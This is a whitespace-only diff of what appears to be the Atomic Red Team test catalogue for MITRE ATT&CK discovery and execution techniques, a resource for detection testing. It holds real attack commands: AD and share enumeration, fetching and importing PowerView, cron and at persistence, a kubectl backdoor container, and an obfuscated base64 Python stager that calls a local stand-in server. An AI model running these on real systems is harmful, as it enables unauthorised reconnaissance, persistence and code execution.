get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url}
@@ -59704,7 +59704,7 @@ discovery:
auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c
description: 'Scan ports to check for listening ports with python
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -59720,17 +59720,17 @@ discovery:
dependencies:
- description: 'Check if python exists on the machine
-'
+ '
prereq_command: 'if (python --version) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'echo "Python 3 must be installed manually"
-'
+ '
executor:
command: 'python #{filename} -i #{host_ip}
-'
+ '
name: powershell
T1135:
technique:
@@ -59796,7 +59796,7 @@ discovery:
auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7
description: 'Network Share Discovery
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -59814,7 +59814,7 @@ discovery:
auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae
description: 'Network Share Discovery using smbstatus
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -59831,16 +59831,16 @@ discovery:
dependencies:
- description: 'Package with smbstatus (samba) must exist on device
-'
+ '
prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit
1; fi
-'
+ '
get_prereq_command: "sudo #{package_installer} \n"
executor:
command: 'smbstatus --shares
-'
+ '
name: bash
elevation_required: true
- name: Network Share Discovery command prompt
@@ -59858,7 +59858,7 @@ discovery:
executor:
command: 'net view \\#{computer_name}
-'
+ '
name: command_prompt
- name: Network Share Discovery PowerShell
auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb
@@ -59870,7 +59870,7 @@ discovery:
executor:
command: 'get-smbshare
-'
+ '
name: powershell
- name: View available share drives
auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae
@@ -59882,28 +59882,28 @@ discovery:
executor:
command: 'net share
-'
+ '
name: command_prompt
- name: Share Discovery with PowerView
auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd
description: 'Enumerate Domain Shares the current user has access. Upon execution,
progress info about each share being scanned will be displayed.
-'
+ '
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Endpoint must be joined to domain
-'
+ '
prereq_command: 'if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: '"Join system to domain"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -59928,7 +59928,7 @@ discovery:
get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1"
-OutFile $env:TEMP\PowerView.ps1
-'
+ '
executor:
command: |
Import-Module $env:TEMP\PowerView.ps1
@@ -60005,11 +60005,11 @@ discovery:
dependencies:
- description: 'Check if at least one of tcpdump or tshark is installed.
-'
+ '
prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
-v tshark)" ]; then exit 1; else exit 0; fi;
-'
+ '
get_prereq_command: "(which yum && yum -y install epel-release tcpdump tshark)||(which
apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n"
executor:
@@ -60035,11 +60035,11 @@ discovery:
dependencies:
- description: 'Check if at least one of tcpdump or tshark is installed.
-'
+ '
prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
-v tshark)" ]; then exit 1; else exit 0; fi;
-'
+ '
get_prereq_command: "(which yum && yum -y install epel-release tcpdump tshark)||(which
apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n"
executor:
@@ -60082,14 +60082,14 @@ discovery:
- description: 'tshark must be installed and in the default path of "c:\Program
Files\Wireshark\Tshark.exe".
-'
+ '
prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}
Start-Process $env:temp\wireshark_installer.exe /S
- description: 'npcap must be installed.
-'
+ '
prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url}
@@ -60097,7 +60097,7 @@ discovery:
executor:
command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
-'
+ '
name: command_prompt
elevation_required: true
- name: Windows Internal Packet Capture
@@ -60180,57 +60180,57 @@ discovery:
auto_generated_guid: '085fe567-ac84-47c7-ac4c-2688ce28265b'
description: 'Lists the password complexity policy to console on Ubuntu Linux.
-'
+ '
supported_platforms:
- linux
executor:
command: 'cat /etc/pam.d/common-password
-'
+ '
name: bash
- name: Examine password complexity policy - CentOS/RHEL 7.x
auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d
description: 'Lists the password complexity policy to console on CentOS/RHEL
7.x Linux.
-'
+ '
supported_platforms:
- linux
dependencies:
- description: 'System must be CentOS or RHEL v7
-'
+ '
prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "7" ]; then
exit /b 0; else exit /b 1; fi;
-'
+ '
get_prereq_command: 'echo Please run from CentOS or RHEL v7
-'
+ '
executor:
command: 'cat /etc/security/pwquality.conf
-'
+ '
name: bash
- name: Examine password complexity policy - CentOS/RHEL 6.x
auto_generated_guid: 6ce12552-0adb-4f56-89ff-95ce268f6358
description: 'Lists the password complexity policy to console on CentOS/RHEL
6.x Linux.
-'
+ '
supported_platforms:
- linux
dependencies:
- description: 'System must be CentOS or RHEL v6
-'
+ '
prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "6" ]; then
exit /b 0; else exit /b 1; fi;
-'
+ '
get_prereq_command: 'echo Please run from CentOS or RHEL v6
-'
+ '
executor:
command: |
cat /etc/pam.d/system-auth
@@ -60240,43 +60240,43 @@ discovery:
auto_generated_guid: 7c86c55c-70fa-4a05-83c9-3aa19b145d1a
description: 'Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
-'
+ '
supported_platforms:
- linux
executor:
command: 'cat /etc/login.defs
-'
+ '
name: bash
- name: Examine local password policy - Windows
auto_generated_guid: 4588d243-f24e-4549-b2e3-e627acc089f6
description: 'Lists the local password policy to console on Windows.
-'
+ '
supported_platforms:
- windows
executor:
command: 'net accounts
-'
+ '
name: command_prompt
- name: Examine domain password policy - Windows
auto_generated_guid: 46c2c362-2679-4ef5-aec9-0e958e135be4
description: 'Lists the domain password policy to console on Windows.
-'
+ '
supported_platforms:
- windows
executor:
command: 'net accounts /domain
-'
+ '
name: command_prompt
- name: Examine password policy - macOS
auto_generated_guid: 4b7fa042-9482-45e1-b348-4b756b2a0742
description: 'Lists the password policy to console on macOS.
-'
+ '
supported_platforms:
- macos
executor:
@@ -60288,7 +60288,7 @@ discovery:
domain policy or the domain controller policy for the current domain or a
specified domain/domain controller.
-'
+ '
supported_platforms:
- windows
executor:
@@ -60489,7 +60489,7 @@ discovery:
ps aux >> #{output_file}
cleanup_command: 'rm #{output_file}
-'
+ '
name: sh
- name: Process Discovery - tasklist
auto_generated_guid: c5806a4f-62b8-4900-980b-c7ec004e9908
@@ -60501,7 +60501,7 @@ discovery:
executor:
command: 'tasklist
-'
+ '
name: command_prompt
- name: Process Discovery - Get-Process
auto_generated_guid: 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34
@@ -60513,7 +60513,7 @@ discovery:
executor:
command: 'Get-Process
-'
+ '
name: powershell
- name: Process Discovery - get-wmiObject
auto_generated_guid: b51239b4-0129-474f-a2b4-70f855b9f2c2
@@ -60525,7 +60525,7 @@ discovery:
executor:
command: 'get-wmiObject -class Win32_Process
-'
+ '
name: powershell
- name: Process Discovery - wmic process
auto_generated_guid: 640cbf6d-659b-498b-ba53-f6dd1a1cc02c
@@ -60537,7 +60537,7 @@ discovery:
executor:
command: 'wmic process get /format:list
-'
+ '
name: command_prompt
T1012:
technique:
@@ -60703,7 +60703,7 @@ discovery:
executor:
command: 'net group "Domain Computers" /domain
-'
+ '
name: command_prompt
- name: Remote System Discovery - nltest
auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8
@@ -60721,7 +60721,7 @@ discovery:
executor:
command: 'nltest.exe /dclist:#{target_domain}
-'
+ '
name: command_prompt
- name: Remote System Discovery - ping sweep
auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592
@@ -60734,7 +60734,7 @@ discovery:
executor:
command: 'for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
-'
+ '
name: command_prompt
- name: Remote System Discovery - arp
auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574
@@ -60745,7 +60745,7 @@ discovery:
executor:
command: 'arp -a
-'
+ '
name: command_prompt
- name: Remote System Discovery - arp nix
auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951
@@ -60760,17 +60760,17 @@ discovery:
dependencies:
- description: 'Check if arp command exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1;
fi;
-'
+ '
get_prereq_command: "(which yum && yum -y install net-tools)||(which apt-get
&& apt-get install -y net-tools)\n"
executor:
command: 'arp -a | grep -v ''^?''
-'
+ '
name: sh
- name: Remote System Discovery - sweep
auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de
@@ -60798,7 +60798,7 @@ discovery:
command: 'for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip;
[ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done
-'
+ '
name: sh
- name: Remote System Discovery - nslookup
auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f
@@ -60843,35 +60843,35 @@ discovery:
dependencies:
- description: 'Computer must have python 3 installed
-'
+ '
prereq_command: 'if (python --version) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'echo "Python 3 must be installed manually"
-'
+ '
- description: 'Computer must have pip installed
-'
+ '
prereq_command: 'if (pip3 -V) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'echo "PIP must be installed manually"
-'
+ '
- description: 'adidnsdump must be installed and part of PATH
-'
+ '
prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'pip3 install adidnsdump
-'
+ '
executor:
command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
-'
+ '
name: command_prompt
elevation_required: true
- name: Adfind - Enumerate Active Directory Computer Objects
@@ -60890,14 +60890,14 @@ discovery:
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
-'
+ '
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-OutFile #{adfind_path}
-'
+ '
executor:
command: "#{adfind_path} -f (objectcategory=computer)\n"
name: command_prompt
@@ -60917,14 +60917,14 @@ discovery:
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
-'
+ '
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-OutFile #{adfind_path}
-'
+ '
executor:
command: "#{adfind_path} -sc dclist\n"
name: command_prompt
@@ -60938,17 +60938,17 @@ discovery:
dependencies:
- description: 'Check if ip command exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: 'apt-get install iproute2 -y
-'
+ '
executor:
command: 'ip neighbour show
-'
+ '
name: sh
- name: Remote System Discovery - ip route
auto_generated_guid: 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1
@@ -60960,17 +60960,17 @@ discovery:
dependencies:
- description: 'Check if ip command exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: 'apt-get install iproute2 -y
-'
+ '
executor:
command: 'ip route show
-'
+ '
name: sh
- name: Remote System Discovery - ip tcp_metrics
auto_generated_guid: 6c2da894-0b57-43cb-87af-46ea3b501388
@@ -60982,17 +60982,17 @@ discovery:
dependencies:
- description: 'Check if ip command exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: 'apt-get install iproute2 -y
-'
+ '
executor:
command: 'ip tcp_metrics show |grep --invert-match "^127\."
-'
+ '
name: sh
- name: Enumerate domain computers within Active Directory using DirectorySearcher
auto_generated_guid: 962a6017-1c09-45a6-880b-adc9c57cb22e
@@ -61035,7 +61035,7 @@ discovery:
elevation_required: false
command: 'Get-AdComputer -Filter *
-'
+ '
- name: Enumerate Active Directory Computers with ADSISearcher
auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
description: |
@@ -61049,14 +61049,14 @@ discovery:
elevation_required: false
command: '([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
-'
+ '
- name: Get-DomainController with PowerView
auto_generated_guid: b9d2e8ca-5520-4737-8076-4f08913da2c4
description: 'Utilizing PowerView, run Get-DomainController to identify the
Domain Controller. Upon execution, information about the domain controller
within the domain will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -61176,7 +61176,7 @@ discovery:
executor:
command: 'ps aux | egrep ''Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu''
-'
+ '
name: sh
- name: Security Software Discovery - ps (Linux)
auto_generated_guid: 23b91cd2-c99c-4002-9e41-317c63e024a2
@@ -61188,7 +61188,7 @@ discovery:
executor:
command: 'ps aux | egrep ''falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd''
-'
+ '
name: sh
- name: Security Software Discovery - Sysmon Service
auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9
@@ -61201,7 +61201,7 @@ discovery:
executor:
command: 'fltmc.exe | findstr.exe 385201
-'
+ '
name: command_prompt
elevation_required: true
- name: Security Software Discovery - AV Discovery via WMI
@@ -61278,7 +61278,7 @@ discovery:
command: 'reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer"
/v svcVersion
-'
+ '
name: command_prompt
- name: Applications Installed
auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b
@@ -61298,7 +61298,7 @@ discovery:
software that is installed on the system. Adversaries may use the information
from Software Discovery during automated discovery to shape follow-on behaviors
-'
+ '
supported_platforms:
- macos
executor:
@@ -61411,7 +61411,7 @@ discovery:
| grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization
Environment detected"; fi;
-'
+ '
- name: Detect Virtualization Environment (Windows)
auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d
description: 'Windows Management Instrumentation(WMI) objects contains system
@@ -61421,7 +61421,7 @@ discovery:
This is meant to find the result of Not supported, which is the result if
run in a virtual machine
-'
+ '
supported_platforms:
- windows
executor:
@@ -61438,7 +61438,7 @@ discovery:
the system. If it''s a virtual machine, one of the device manufacturer will
be a Virtualization Software.
-'
+ '
supported_platforms:
- macos
executor:
@@ -61448,7 +61448,7 @@ discovery:
''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment
detected''; fi;
-'
+ '
- name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)
auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78
description: "Windows Management Instrumentation(WMI) objects contain system
@@ -61540,7 +61540,7 @@ discovery:
description: 'Identify System Info. Upon execution, system info and time info
will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -61552,7 +61552,7 @@ discovery:
auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6
description: 'Identify System Info
-'
+ '
supported_platforms:
- macos
executor:
@@ -61564,7 +61564,7 @@ discovery:
auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c
description: 'Identify System Info
-'
+ '
supported_platforms:
- linux
- macos
@@ -61581,14 +61581,14 @@ discovery:
#{output_file} 2>/dev/null\n"
cleanup_command: 'rm #{output_file} 2>/dev/null
-'
+ '
name: sh
- name: Linux VM Check via Hardware
auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec
description: 'Identify virtual machine hardware. This technique is used by the
Pupy RAT and other malware.
-'
+ '
supported_platforms:
- linux
executor:
@@ -61607,7 +61607,7 @@ discovery:
description: 'Identify virtual machine guest kernel modules. This technique
is used by the Pupy RAT and other malware.
-'
+ '
supported_platforms:
- linux
executor:
@@ -61623,40 +61623,40 @@ discovery:
description: 'Identify system hostname for Windows. Upon execution, the hostname
of the device will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
command: 'hostname
-'
+ '
name: command_prompt
- name: Hostname Discovery
auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133
description: 'Identify system hostname for Linux and macOS systems.
-'
+ '
supported_platforms:
- linux
- macos
executor:
command: 'hostname
-'
+ '
name: bash
- name: Windows MachineGUID Discovery
auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8
description: 'Identify the Windows MachineGUID value for a system. Upon execution,
the machine GUID will be displayed from registry.
-'
+ '
supported_platforms:
- windows
executor:
command: 'REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v
MachineGuid
-'
+ '
name: command_prompt
- name: Griffon Recon
auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370
@@ -61681,27 +61681,27 @@ discovery:
description: 'Identify all environment variables. Upon execution, environments
variables and your path info will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
command: 'set
-'
+ '
name: command_prompt
- name: Environment variables discovery on macos and linux
auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720
description: 'Identify all environment variables. Upon execution, environments
variables and your path info will be displayed.
-'
+ '
supported_platforms:
- macos
- linux
executor:
command: 'env
-'
+ '
name: sh
- name: Show System Integrity Protection status (MacOS)
auto_generated_guid: 327cc050-9e99-4c8e-99b5-1d15f2fb6b96
@@ -61709,13 +61709,13 @@ discovery:
is commonly used by malware and post-exploitation tools to determine whether
certain files and directories on the system are writable or not.
-'
+ '
supported_platforms:
- macos
executor:
command: 'csrutil status
-'
+ '
name: sh
T1614.001:
technique:
@@ -61944,7 +61944,7 @@ discovery:
executor:
command: 'netsh advfirewall firewall show rule name=all
-'
+ '
name: command_prompt
- name: System Network Configuration Discovery
auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17
@@ -61959,11 +61959,11 @@ discovery:
dependencies:
- description: 'Check if arp command exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1;
fi;
-'
+ '
get_prereq_command: "(which yum && yum -y install net-tools)||(which apt-get
&& DEBIAN_FRONTEND=noninteractive apt-get install -y net-tools)\n"
executor:
@@ -62015,10 +62015,10 @@ discovery:
dependencies:
- description: 'Test requires #{port_file} to exist
-'
+ '
prereq_command: 'if (Test-Path "#{port_file}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}"
@@ -62037,7 +62037,7 @@ discovery:
| Out-File -Encoding ASCII -append $file\nWrite-Host $results\n"
cleanup_command: 'Remove-Item -ErrorAction ignore "#{output_file}"
-'
+ '
name: powershell
- name: Adfind - Enumerate Active Directory Subnet Objects
auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee
@@ -62055,14 +62055,14 @@ discovery:
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
-'
+ '
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-OutFile #{adfind_path}
-'
+ '
executor:
command: "#{adfind_path} -f (objectcategory=subnet)\n"
name: command_prompt
@@ -62191,7 +62191,7 @@ discovery:
executor:
command: 'Get-NetTCPConnection
-'
+ '
name: powershell
- name: System Network Connections Discovery Linux & MacOS
auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
@@ -62206,14 +62206,14 @@ discovery:
dependencies:
- description: 'Check if netstat command exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v netstat)" ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'echo "Install netstat on the machine."; exit 1;
-'
+ '
executor:
command: |
netstat
@@ -62247,10 +62247,10 @@ discovery:
dependencies:
- description: 'Sharpview.exe must exist on disk at specified location (#{SharpView})
-'
+ '
prereq_command: 'if (Test-Path #{SharpView}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null
Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}"
@@ -62364,7 +62364,7 @@ discovery:
\n$env:UserName | Out-File -FilePath .\\CurrentactiveUser.txt -Append\n"
cleanup_command: 'Remove-Item -Path .\CurrentactiveUser.txt -Force
-'
+ '
name: powershell
- name: GetCurrent User with PowerShell Script
auto_generated_guid: 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b
@@ -62377,7 +62377,7 @@ discovery:
-FilePath .\\CurrentUserObject.txt\n"
cleanup_command: 'Remove-Item -Path .\CurrentUserObject.txt -Force
-'
+ '
name: powershell
T1007:
technique:
@@ -62456,10 +62456,10 @@ discovery:
executor:
command: 'net.exe start >> #{output_file}
-'
+ '
cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1
-'
+ '
name: command_prompt
T1124:
technique:
@@ -62526,7 +62526,7 @@ discovery:
description: 'Identify the system time. Upon execution, the local computer system
time and timezone will be displayed.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -62544,13 +62544,13 @@ discovery:
description: 'Identify the system time via PowerShell. Upon execution, the system
time will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
command: 'Get-Date
-'
+ '
name: powershell
- name: System Time Discovery in macOS
auto_generated_guid: f449c933-0891-407f-821e-7916a21a1a6f
@@ -62561,7 +62561,7 @@ discovery:
executor:
command: 'date
-'
+ '
name: sh
T1497.003:
technique:
@@ -66420,7 +66420,7 @@ execution:
command: 'osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg==''));\\\"
| python &\""
-'
+ '
name: sh
T1053.001:
technique:
@@ -66491,7 +66491,7 @@ execution:
description: 'This test submits a command to be run in the future by the `at`
daemon.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -66507,30 +66507,30 @@ execution:
dependencies:
- description: 'The `at` and `atd` executables must exist in the PATH
-'
+ '
prereq_command: 'which at && which atd
-'
+ '
get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found
in the PATH (Package name: `at`)''
-'
+ '
- description: 'The `atd` daemon must be running
-'
+ '
prereq_command: 'systemctl status atd || service atd status
-'
+ '
get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service
atd start` ; systemd: `systemctl start atd`)''
-'
+ '
executor:
name: sh
elevation_required: false
command: 'echo "#{at_command}" | at #{time_spec}
-'
+ '
T1053.002:
technique:
object_marking_refs:
@@ -66627,7 +66627,7 @@ execution:
elevation_required: false
command: 'at 13:20 /interactive cmd
-'
+ '
T1059:
technique:
object_marking_refs:
@@ -66937,7 +66937,7 @@ execution:
a backdoor container, and run their malicious code remotely by using “kubectl
exec”.
-'
+ '
supported_platforms:
- containers
input_arguments:
@@ -66952,20 +66952,20 @@ execution:
dependencies:
- description: 'kubectl must be installed
-'
+ '
get_prereq_command: 'echo "kubectl must be installed manually"
-'
+ '
prereq_command: 'which kubectl
-'
+ '
executor:
command: |
kubectl create -f src/busybox.yaml -n #{namespace}
kubectl exec -n #{namespace} busybox -- #{command}
cleanup_command: 'kubectl delete pod busybox -n #{namespace}
-'
+ '
name: bash
elevation_required: false
T1053.007:
@@ -67035,7 +67035,7 @@ execution:
CronJob for scheduling execution of malicious code that would run as a container
in the cluster.
-'
+ '
supported_platforms:
- containers
input_arguments:
@@ -67046,17 +67046,17 @@ execution:
dependencies:
- description: 'kubectl must be installed
-'
+ '
get_prereq_command: 'echo "kubectl must be installed manually"
-'
+ '
prereq_command: 'which kubectl
-'
+ '
executor:
command: 'kubectl get cronjobs -n #{namespace}
-'
+ '
name: bash
elevation_required: false
- name: CreateCronjob
@@ -67068,7 +67068,7 @@ execution:
CronJob for scheduling execution of malicious code that would run as a container
in the cluster.
-'
+ '
supported_platforms:
- containers
input_arguments:
@@ -67079,20 +67079,20 @@ execution:
dependencies:
- description: 'kubectl must be installed
-'
+ '
get_prereq_command: 'echo "kubectl must be installed manually"
-'
+ '
prereq_command: 'which kubectl
-'
+ '
executor:
command: 'kubectl create -f src/cronjob.yaml -n #{namespace}
-'
+ '
cleanup_command: 'kubectl delete cronjob art -n #{namespace}
-'
+ '
name: bash
elevation_required: false
T1053.003:
@@ -67159,7 +67159,7 @@ execution:
of the referenced file. This technique was used by numerous IoT automated
exploitation attacks.
-'
+ '
supported_platforms:
- macos
- linux
@@ -67179,7 +67179,7 @@ execution:
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
cleanup_command: 'crontab /tmp/notevil
-'
+ '
- name: Cron - Add script to all cron subfolders
auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily,
@@ -67187,7 +67187,7 @@ execution:
schedule. This technique was used by the threat actor Rocke during the exploitation
of Linux web servers.
-'
+ '
supported_platforms:
- macos
- linux
@@ -67219,7 +67219,7 @@ execution:
to execute on a schedule. This technique was used by the threat actor Rocke
during the exploitation of Linux web servers.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -67236,10 +67236,10 @@ execution:
name: bash
command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
-'
+ '
cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name}
-'
+ '
T1610:
technique:
object_marking_refs:
@@ -67391,7 +67391,7 @@ execution:
auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd
description: 'Executes commands via DDE using Microsfot Word
-'
+ '
supported_platforms:
- windows
executor:
@@ -67414,13 +67414,13 @@ execution:
ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download
and execute a powershell script
-'
+ '
supported_platforms:
- windows
executor:
command: 'start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx
-'
+ '
name: command_prompt
- name: DDEAUTO
auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181
@@ -67752,7 +67752,7 @@ execution:
auto_generated_guid: 6fb61988-724e-4755-a595-07743749d4e2
description: 'Utilize launchctl
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -67767,10 +67767,10 @@ execution:
executor:
command: 'launchctl submit -l #{label_name} -- #{executable_path}
-'
+ '
cleanup_command: 'launchctl remove #{label_name}
-'
+ '
name: bash
T1053.004:
technique:
@@ -67927,7 +67927,7 @@ execution:
jse_path:
description: 'Path for the macro to write out the "malicious" .jse file
-'
+ '
type: String
default: C:\Users\Public\art.jse
ms_product:
@@ -67938,7 +67938,7 @@ execution:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -67949,7 +67949,7 @@ execution:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: |
